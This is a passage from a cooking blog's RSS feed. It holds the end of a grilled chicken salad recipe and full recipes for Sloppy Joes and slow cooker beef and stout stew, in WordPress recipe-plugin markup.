<li class="instruction">Meanwhile preheat grill. Pull the chicken out of the marinade and let any excess drip off. Grill the chicken for 6 to 8 minutes per side or until cooked through.. Let rest for 5 minutes, then slice as needed.</li>
<li class="instruction">To make the dressing, place the basil leaves in a small food processor or blender, and pulse until chopped. Add the lemon juice, salt and pepper black pepper and honey, pulsing to combine. Add the olive oil, and process until combined. Season to taste with additional salt, pepper and honey.</li>
<li class="instruction">To assemble the salad, line each plate with lettuce leaves, then top with sliced chicken, avocado, tomatoes and red onion. Drizzle basil dressing over top. Sprinkle lightly with salt and pepper.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2016/11/16/lemon-marinated-grilled-chicken-salad-with-lemon-basil-dressing/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Sloppy Joes</title>
		<link>http://cheftomcooks.com/2016/11/01/sloppy-joes/</link>
					<comments>http://cheftomcooks.com/2016/11/01/sloppy-joes/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 01 Nov 2016 23:34:20 +0000</pubDate>
				<category><![CDATA[Beef]]></category>
		<category><![CDATA[Main Dish]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[Sandwich]]></category>
		<category><![CDATA[sandwich]]></category>
		<category><![CDATA[sloppy joe]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107232</guid>

					<description><![CDATA[This rich and flavorful sloppy joe recipe comes out so much better than the canned version! Sloppy Joes Recipe Type: Main Dish Author: Chef Tom Prep time: 10 mins Cook [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107233" src="http://cheftomcooks.com/wp-content/uploads/2016/11/sloppyjoe.jpg" alt="sloppy joes" width="550" height="309" srcset="http://cheftomcooks.com/wp-content/uploads/2016/11/sloppyjoe.jpg 550w, http://cheftomcooks.com/wp-content/uploads/2016/11/sloppyjoe-300x169.jpg 300w" sizes="auto, (max-width: 550px) 100vw, 550px" /></p>
<p>This rich and flavorful sloppy joe recipe comes out so much better than the canned version!</p>
<div class="easyrecipe" data-rating="0">
<div class="item ERName">Sloppy Joes</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Main Dish</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT10M">10 mins</time></div>
<div class="ERHead">Cook time: <time itemprop="cookTime" datetime="PT25M">25 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT35M">35 mins</time></div>
<div class="ERHead">Serves: <span class="yield">6-8 servings</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">2-1/2 pounds Ground Beef</li>
<li class="ingredient">1/2 whole Large Onion, Diced</li>
<li class="ingredient">1 whole Large Green Bell Pepper, Diced</li>
<li class="ingredient">2 celery stalks, diced</li>
<li class="ingredient">5 cloves Garlic, Minced</li>
<li class="ingredient">1-1/2 cup Ketchup</li>
<li class="ingredient">1 cup Water</li>
<li class="ingredient">2 Tablespoons Brown Sugar</li>
<li class="ingredient">2 teaspoons Chili Powder (more To Taste)</li>
<li class="ingredient">1 teaspoon Dry Mustard</li>
<li class="ingredient">1/2 teaspoon Red Pepper Flakes (more To Taste)</li>
<li class="ingredient">Worcestershire Sauce, To Taste</li>
<li class="ingredient">2 Tablespoons Tomato Paste</li>
<li class="ingredient">Salt To Taste</li>
<li class="ingredient">Freshly Ground Black Pepper, To Taste</li>
<li class="ingredient">Rolls</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">Heat a large skillet over medium high heat. Add ground beef and cook until brown. Drain most of the fat and discard.</li>
<li class="instruction">Add onions, green pepper, celery and garlic. Cook for a few minutes, or until vegetables become tender. Season with salt and black pepper.</li>
<li class="instruction">Add ketchup, brown sugar, chili pepper, dry mustard, and water. Stir to combine and simmer for 15 minutes, adding salt and pepper to taste. Also add tomato paste and Worcestershire. Taste and adjust seasonings as needed.</li>
<li class="instruction">Serve on rolls.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2016/11/01/sloppy-joes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Slow Cooker Beef &#038; Stout Stew</title>
		<link>http://cheftomcooks.com/2016/10/04/slow-cooker-beef-stout-stew/</link>
					<comments>http://cheftomcooks.com/2016/10/04/slow-cooker-beef-stout-stew/#comments</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 04 Oct 2016 19:18:50 +0000</pubDate>
				<category><![CDATA[Beef]]></category>
		<category><![CDATA[Main Dish]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[Stew]]></category>
		<category><![CDATA[stout]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107226</guid>

					<description><![CDATA[I made this hearty beef stew using Southdown Stout, a local beer from Sand City Brewing.  Feel free to use your favorite stout in this recipe. Slow Cooker Beef &#38; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>I made this hearty beef stew using Southdown Stout, a local beer from <a href="http://www.sandcitybeer.com/" target="_blank">Sand City Brewing</a>.  Feel free to use your favorite stout in this recipe.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107227" src="http://cheftomcooks.com/wp-content/uploads/2016/10/beef-stout-stew.jpg" alt="beef-stout-stew" width="550" height="334" srcset="http://cheftomcooks.com/wp-content/uploads/2016/10/beef-stout-stew.jpg 550w, http://cheftomcooks.com/wp-content/uploads/2016/10/beef-stout-stew-300x182.jpg 300w" sizes="auto, (max-width: 550px) 100vw, 550px" /></p>
<div class="easyrecipe" data-rating="0">	<link itemprop="image" href="http://cheftomcooks.com/wp-content/uploads/2016/10/beef-stout-stew.jpg" />
<div class="item ERName">Slow Cooker Beef &amp; Stout Stew</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Main Dish</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT20M">20 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT20M">20 mins</time></div>
<div class="ERHead">Serves: <span class="yield">6-8 servings</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">3 pounds lean beef stew meat cut in 1&#8243; cubes</li>
<li class="ingredient">½ cup white all purpose flour</li>
<li class="ingredient">1 pound carrots, chopped (about 4 large, will yield 3 cups)</li>
<li class="ingredient">1 pound yukon gold potatoes, chopped (about 4 medium size, will yield 3 cups)</li>
<li class="ingredient">2 large yellow onions, chopped</li>
<li class="ingredient">3 cloves of garlic, grated of finely minced</li>
<li class="ingredient">1 tablespoon tomato paste</li>
<li class="ingredient">12oz stout beer</li>
<li class="ingredient">64 ounces (8 cups) chicken stock, divided</li>
<li class="ingredient">10oz frozen peas</li>
<li class="ingredient">12oz white mushrooms, quartered</li>
<li class="ingredient">2 bay leaves</li>
<li class="ingredient">salt and pepper</li>
<li class="ingredient">olive oil</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">In a baking dish, stir and combine the flour, 2 teaspoon salt and 2 teaspoon pepper. Add the beef stew meat and toss to coat. Tap off excess, and transfer the flour dredged stew meat to a plate. Discard any leftover flour.</li>
<li class="instruction">Heat a large skillet over medium high heat for 2 minutes. Add 1 teaspoon olive oil, and add about ¼ of the meat, being careful to not overcrowd the pan (otherwise the meat will steam and not brown). Cook about 4 minutes per side, or until golden brown, turning to cook both sides. Transfer the cooked meat to your slow cooker. Repeat to continue browning the meat, adding another teaspoon of olive oil to the pan each time before adding the meat.</li>
<li class="instruction">While the meat is browning, chop up the carrots and potatoes to be about 1&#8243; x ½&#8221; chunks. You don&#8217;t want to cut the vegetables too small, otherwise they won&#8217;t hold up in the stew. Transfer the cut carrots and potatoes to the slow cooker. Chop up the 2 onions and set aside.</li>
<li class="instruction">After the meat is done cooking, add 1 teaspoon of olive oil to the same pan and cook the onions. Season with a pinch of salt and pepper. While the onions are cooking, scrape up any brown bits and cooked flour on the bottom of the pan. Cook for about 5 minutes, until the onions just starting to soften. Add in the garlic and tomato paste, stir and cook for 1 more minute. Add in about 1 cup of the chicken stock and scrape up any remaining bits on the bottom of the pan.</li>
<li class="instruction">Transfer the cooked onions and liquid to the crock pot. Add in the stout beer, remaining chicken stock, and bay leaves to the crock pot. Add the mushrooms. Give a stir to evenly distribute the meat and vegetables.</li>
<li class="instruction">Cover and cook on HIGH for 4-6 hours, or LOW for 8-10 hours. Half way through the cooking time, add the frozen peas. Taste for salt and pepper after cooking.</li>
<li class="instruction">Serve warm, over egg noodles.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2016/10/04/slow-cooker-beef-stout-stew/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
